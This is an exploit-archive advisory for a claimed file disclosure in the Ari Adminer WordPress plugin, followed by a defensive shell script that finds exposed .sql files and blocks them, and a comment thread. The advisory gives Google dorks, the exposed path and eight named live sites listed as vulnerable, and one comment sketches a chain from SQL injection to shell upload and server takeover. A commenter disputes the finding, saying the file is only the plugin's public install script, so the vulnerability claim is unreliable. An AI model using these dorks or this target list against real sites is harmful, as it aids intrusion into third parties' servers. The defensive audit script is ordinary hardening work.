WordPress Ari Adminer 1.1.12 Database Disclosure
Posted Dec 6, 2018
Authored by KingSkrupellos

WordPress Ari Adminer plugin version 1.1.12 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
MD5 | 0d76fb25df6fb402c18b48e874d9ebb0

#################################################################################################

# Exploit Title : WordPress Ari Adminer Plugins 1.1.12 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/12/2018
# Vendor Homepage : ari-soft.com ~ wordpress.org/plugins/ari-adminer/
# Software Download Link : downloads.wordpress.org/plugin/ari-adminer.zip
+ github.com/andrewcy86/ari-adminer/archive/master.zip
+ ari-soft.com/Latest/wordpress-db-manager.html?_2018120603
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.1.12
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/ari-adminer/''
intext:''MAY=leeksperten ITAS - presisjon for perfeksjon'' site:no
intext:''© 2018 M. Bradbury Photography''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/ari-adminer/install/install.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] mbradburyphotography.com/wp-content/plugins/ari-adminer/install/install.sql

[+] clubjimmy.com/WordPress3/wp-content/plugins/ari-adminer/install/install.sql

[+] designbuildideas.eu/wp-content/plugins/ari-adminer/install/install.sql

[+] mygrapefruit.com/wp-content/plugins/ari-adminer/install/install.sql

[+] voleibol.pe/wp-content/plugins/ari-adminer/install/install.sql

[+] it-as.no/wp-content/plugins/ari-adminer/install/install.sql

[+] sapeople.com/wp-content/plugins/ari-adminer/install/install.sql

[+] waupacanow.com/wp-content/plugins/ari-adminer/install/install.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
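As an added, defender-side example that is not part of the advisory or of the ARI Adminer plugin: a POSIX shell script that audits a WordPress document root for `*.sql` files below `wp-content` (the path the advisory points at) and installs an Apache 2.4 `.htaccess` rule under `wp-content` that refuses to serve them. It assumes Apache with `AllowOverride` enabled for the document root; the directory tree it runs against is constructed inline for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the advisory or of the ARI Adminer plugin.
# Audits a WordPress document root for *.sql files that a web server would
# otherwise serve verbatim, and installs an Apache 2.4 .htaccess rule under
# wp-content that refuses them. Assumes Apache with AllowOverride enabled
# for the document root; the sample tree below is constructed for the demo.
set -u

# List every regular *.sql file below wp-content (plugins, themes, uploads).
find_sql_files() {
    docroot="$1"
    find "$docroot/wp-content" -type f -name '*.sql' 2>/dev/null | sort
}

# Write wp-content/.htaccess with a rule that denies direct requests for SQL
# scripts and common dump/backup extensions. Prints the path written.
write_deny_rule() {
    docroot="$1"
    target="$docroot/wp-content/.htaccess"
    cat > "$target" <<'EOF'
# Refuse to serve SQL scripts and dumps shipped inside plugins or themes.
<FilesMatch "\.(sql|sql\.gz|sql\.zip|bak)$">
    Require all denied
</FilesMatch>
EOF
    printf '%s\n' "$target"
}

# Succeeds (exit 0) when the deny rule is present, fails (exit 1) otherwise.
deny_rule_present() {
    grep -q 'Require all denied' "$1/wp-content/.htaccess" 2>/dev/null
}

# Build a constructed document root with the same layout as the advisory's
# path, plus an unrelated plugin file that must not be reported.
make_sample_docroot() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/plugins/ari-adminer/install"
    mkdir -p "$root/wp-content/plugins/other-plugin"
    printf 'CREATE TABLE example (id INT);\n' \
        > "$root/wp-content/plugins/ari-adminer/install/install.sql"
    printf '<?php\n' > "$root/wp-content/plugins/other-plugin/other-plugin.php"
    printf '%s\n' "$root"
}

# Demonstration: audit the sample tree, then install and verify the rule.
demo() {
    root=$(make_sample_docroot)
    echo "SQL files reachable under wp-content:"
    find_sql_files "$root" | sed "s|^$root/||"
    write_deny_rule "$root" >/dev/null
    if deny_rule_present "$root"; then
        echo "deny rule installed in wp-content/.htaccess"
    fi
    rm -rf "$root"
}

demo
```

Run it against a real install as `find_sql_files /var/www/html` to see what a crawler could fetch, then `write_deny_rule /var/www/html` to block it. On nginx the equivalent is a `location ~* \.(sql|bak)$ { deny all; }` block inside the server block. Whether one classifies `install.sql` as a backup or as an installer script, a plugin that needs it reads it from disk through PHP rather than over HTTP, so refusing direct requests for it does not affect the plugin.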

Comments (4)

vrana

This is not a database backup disclosure, this file is part of ARI Adminer and it is publicly available at github.com/andrewcy86/ari-admi…

Comment by vrana
2018-12-07 10:22:42 UTC
vrana

Also your linkification is broken. This is the correct URL: github.com/andrewcy86/ari-admi…

Comment by vrana
2018-12-07 17:47:27 UTC
kingskrupellos

Dear Vrana ;

No, you are wrong. This is a database backup disclosure. Yes, it should be a part of the ARI Adminer plugin. I had already given the same information above.

Read CWE 530 => cwe.mitre.org/data/definitions/530.html

A backup file is stored in a directory that is accessible to actors outside of the intended control sphere.

At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site.

If you read the article carefully, you will see that the links are not broken:

packetstormsecurity.com/files/download/150665/wpariadminer1112-disclose.txt

github.com/andrewcy86/ari-adminer/archive/master.zip

You can find this file yourself. We don't need to give everything. Just search it.

github.com/andrewcy86/ari-adminer/blob/master/install/install.sql

For example: mysql.sql - pgsql.sql - sqlite3.sql => The vendor says that

The .sql files in this directory contain the code to create the tables for database caching.

If you're not using database caching, you can safely ignore these.

If you ARE using database caching, simply load the correct *.sql file into your database to set up the required tables.

Database Caching => en.wikipedia.org/wiki/Database_caching

Database caching is a process included in the design of computer applications which generate web pages on-demand (dynamically) by accessing backend databases.

When these applications are deployed on multi-tier environments that involve browser-based clients, web application servers and backend databases, middle-tier database caching is used to achieve high scalability and performance.

In a three tier architecture, the application software tier and data storage tier can be in different hosts. Throughput of an application can be limited by the network speed. This limitation can be minimized by having the database at the application tier. Because commercial database software makes extensive use of system resources, it is not always practical to have the application and the database at the same host. In this case, a more light-weight database application can be used to cache data from the commercial database management system.

Database caching improves scalability by distributing query workload from backend to multiple cheap front-end systems. It allows flexibility in the processing of data; for example, the data of Platinum customers can be cached while that of ordinary customers are not. Caching can improve availability of data, by providing continued service for applications that depend only on cached tables even if the backend server is unavailable. Another benefit is improved data access speeds brought about by locality of data and smoothing out load peaks by avoiding round-trips between middle-tier and data-tier.

For example: let's say you can do Reverse SQL injection using this database to capture the admin username and password, log in to the dashboard, upload a shell and capture the whole server.

Please do not comment any more.

Search and use your brain.

Have a nice day.

Comment by kingskrupellos
2018-12-08 15:09:26 UTC
vrana

install.sql is not a backup file, it's the installation script. Thus it couldn't qualify as Exposure of Backup File.

Comment by vrana
2018-12-09 10:47:53 UTC